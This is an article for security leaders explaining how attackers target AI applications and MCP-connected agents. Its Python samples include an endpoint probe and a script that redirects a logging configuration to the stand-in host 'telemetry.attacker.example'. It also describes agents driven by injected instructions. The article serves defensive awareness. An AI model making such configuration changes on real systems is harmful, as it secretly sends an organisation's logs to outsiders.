For CISOs already grappling with traditional infosec, AI is a whole new headache. Now, anywhere you introduce AI or make existing tech accessible via AI – whether it’s a factory, lab or office environment – there’s a brand new attack surface that’s zero days old.
We have already seen vulnerabilities in all the leading AI models, including ChatGPT, Gemini, Llama and DeepSeek-R1. With organizations moving to connect AI agents to their wider systems, threat actors are certainly moving in parallel, probing AI as an entry point. If they succeed, the blast radius of an attack can be exponential.
Understanding how attackers operate is key to establishing a strong security posture in the AI era. Analyzing the stages of an attack helps to identify vulnerabilities and lays the groundwork for proactively strengthening defenses, preventing potential damage.
The Old ‘Rules’ Apply
An organized attacker will have a clear objective: what they aim to achieve with their attack. Their focus then moves to the domain; if the objective is to harm a nation state, for example, candidate domains include the health sector, the banking system or air traffic control.
Domain selection is important for threat actors because each domain has different security rules, regulations and defenses. Financial services is one of the most protected domains globally, while health services are historically poor at infosec. Even in well-protected systems, however, AI is opening new access routes for attackers.
After domain selection comes specific target selection. If the objective is to commit fraud against insurance companies, there are many targets to choose from, based on attributes including size, location and security standards. Companies trumpeting AI adoption without adequate AI security controls may find themselves targeted; first-mover advantage has its disadvantages too.
Studying the Target
Once the target is identified, the threat actor shifts to recon: what are the accessible assets that can be targeted? The important word is ‘accessible’. Accessible assets are typically things that people interact with, such as websites, mobile apps, ATMs and public-facing servers.
Threat actors go beyond the obvious, however. An organization may have many network points that aren’t often used; if one is accidentally left live, it could be exploited to access critical systems. Agentic AI must now be taken into consideration: as AI is increasingly connected to both virtual and physical entities, are assets that were previously beyond reach now accessible?
For an attacker, vulnerability probing is the simplest, most efficient way of finding access to your systems. There are many ways to do it, and AI has opened new avenues, including at the inference layer, where a deployed model meets everyday inputs and use cases.
Exposing AI’s Anatomy
This is where things get technical. To probe an AI application, instead of using the web chat interface, attackers will open the browser’s developer tools on the relevant website. Under the ‘Network’ tab, they can see the endpoint that a chat message is sent to when it is typed into the AI application.
The attacker can then call that endpoint directly from a command terminal, rather than through the website, and get the raw response back. That allows them to seek out items that aren’t displayed by the website route, such as extra metadata that offers a hint on how to further their attack.
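To make that concrete, a minimal sketch of such a probe is shown below in Python. The endpoint URL, headers, payload fields and session identifier are hypothetical stand-ins for whatever the Network tab revealed; the point is simply that the raw response can be inspected outside the web interface.

```python
# Minimal sketch: replaying a chat endpoint discovered in the browser's
# Network tab. The URL, payload shape and session value are hypothetical.
import json
import requests

ENDPOINT = "https://app.example.com/api/chat"  # hypothetical endpoint from dev tools

resp = requests.post(
    ENDPOINT,
    headers={"Content-Type": "application/json"},
    json={"message": "Hello", "session_id": "abc123"},  # mirrors what the web UI sends
    timeout=30,
)

# The raw JSON often carries fields the web UI never renders, such as model
# names, system prompt fragments or internal identifiers, each a potential hint.
print(json.dumps(resp.json(), indent=2))
```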
At this point, a hacker is making progress. If they initially identified six assets and two showed useful metadata, they now have their first potential angles of access. The less vulnerable assets can be parked for now, though the attacker may return for a deeper look if their first options are unsuccessful.
An Arsenal of Options
A serious threat actor will have an arsenal of tools, allowing them to pursue a ratcheted attack. Put simply, they will start with their cheapest and quickest techniques and avoid exposing their best weapon; no grandmaster will show their most intricate chess move when using a pawn will do the job.
Sophisticated attack weapons are valuable but, once identified, they are likely to be protected against in future and become obsolete. For this reason, an attacker is likely to cycle through targeting a number of assets with low-to-midpoint attack methods, rather than risking their most prized weapon.
There are exceptions, of course: if the target is valuable enough, the attacker may choose to escalate to their most sophisticated weaponry.
Attack Outcomes
A successful attack has one of two possible outcomes: exfiltrate or insert. Exfiltrate is the more straightforward of the two and involves extracting something of value from the target, such as money, financial data or sensitive customer information.
With agentic AI, the risks are raised. It is becoming common for agentic AI systems to use the Model Context Protocol (MCP) – promoted by Anthropic and others – as an open standard for interfacing with applications such as browsers and business tools.
Browsers, of course, are the window onto everything from email systems to bank accounts and booking engines. Business tools have access to proprietary information. In this environment, anything connected to agentic AI via MCP has to be seen as a significant new attack surface.
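As an illustration of how little it takes to widen that surface, the sketch below uses the FastMCP helper from the official MCP Python SDK to expose a single, hypothetical business tool to an agent. The server name, tool and return value are invented for the example; the point is that every function published this way becomes reachable by whatever drives the agent, including injected instructions.

```python
# Minimal sketch of an MCP server exposing a hypothetical business tool,
# using the FastMCP helper from the official Python SDK (pip install mcp).
from mcp.server.fastmcp import FastMCP

mcp = FastMCP("crm-tools")  # hypothetical server name

@mcp.tool()
def lookup_customer(customer_id: str) -> str:
    """Return proprietary CRM details for a customer (placeholder data)."""
    # In a real deployment this would query internal systems; once published
    # over MCP it is reachable by whatever drives the agent, so it must be
    # treated as attack surface in its own right.
    return f"record for {customer_id} (placeholder)"

if __name__ == "__main__":
    mcp.run()  # serves the tool over stdio to an MCP-compatible client
```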
Insert attacks are more difficult and can be more damaging. Consider the analogy of your home being broken into: the immediate concern will be about what was taken, but what if the intruder left a camera and can watch your every move?
In the digital domain, agentic AI that has access to browsers and applications via MCP opens up new routes for sophisticated insert attacks. Think of modifying a log endpoint to send logs to an external collector, or changing a physical security schedule to turn off at weekends.
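A hedged sketch of the first of those examples follows: a single edited value in a hypothetical logging configuration quietly redirects telemetry to an external collector. The file path, keys and URLs are illustrative only, not drawn from any real product.

```python
# Sketch of an 'insert'-style change: one edited value in a hypothetical
# logging configuration redirects telemetry to an attacker-controlled collector.
import json

CONFIG_PATH = "/etc/acme/logging.json"  # hypothetical path

with open(CONFIG_PATH) as f:
    config = json.load(f)

# Before: {"collector_url": "https://logs.internal.acme/ingest", ...}
config["collector_url"] = "https://telemetry.attacker.example/ingest"

with open(CONFIG_PATH, "w") as f:
    json.dump(config, f, indent=2)
# Nothing visibly breaks for the defender: logs still flow, only now to the
# external collector rather than the internal one.
```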
A threat actor will also be thinking about lateral movement. An initial incursion might only yield access to a mid-level manager’s laptop, but that offers the potential to move around the system and find a path to escalate privileges to a more senior level.
The Open Source Handbook
As with everything in AI, the attack environment is evolving rapidly. The creators of the first models kept their inner workings under wraps, but DeepSeek’s open-source approach has effectively put a handbook for its R1 model in the public domain, a game-changer for developers and threat actors alike.
Over 7,000 derivatives of R1 have already been created since its launch in late January 2025, and the provenance of many of these is effectively unknown. While code sharing is welcome for innovation, threat actors are undoubtedly probing R1’s workings for ways to attack existing and future AI models.
This is how threat actors think – and we in the security community have to keep pace.
It’s clear that robust defensive and offensive security measures – including proactive and persistent red teaming of AI models and applications – are essential to mitigate potential risks. As in the medical world, preventive care is preferable to a post mortem.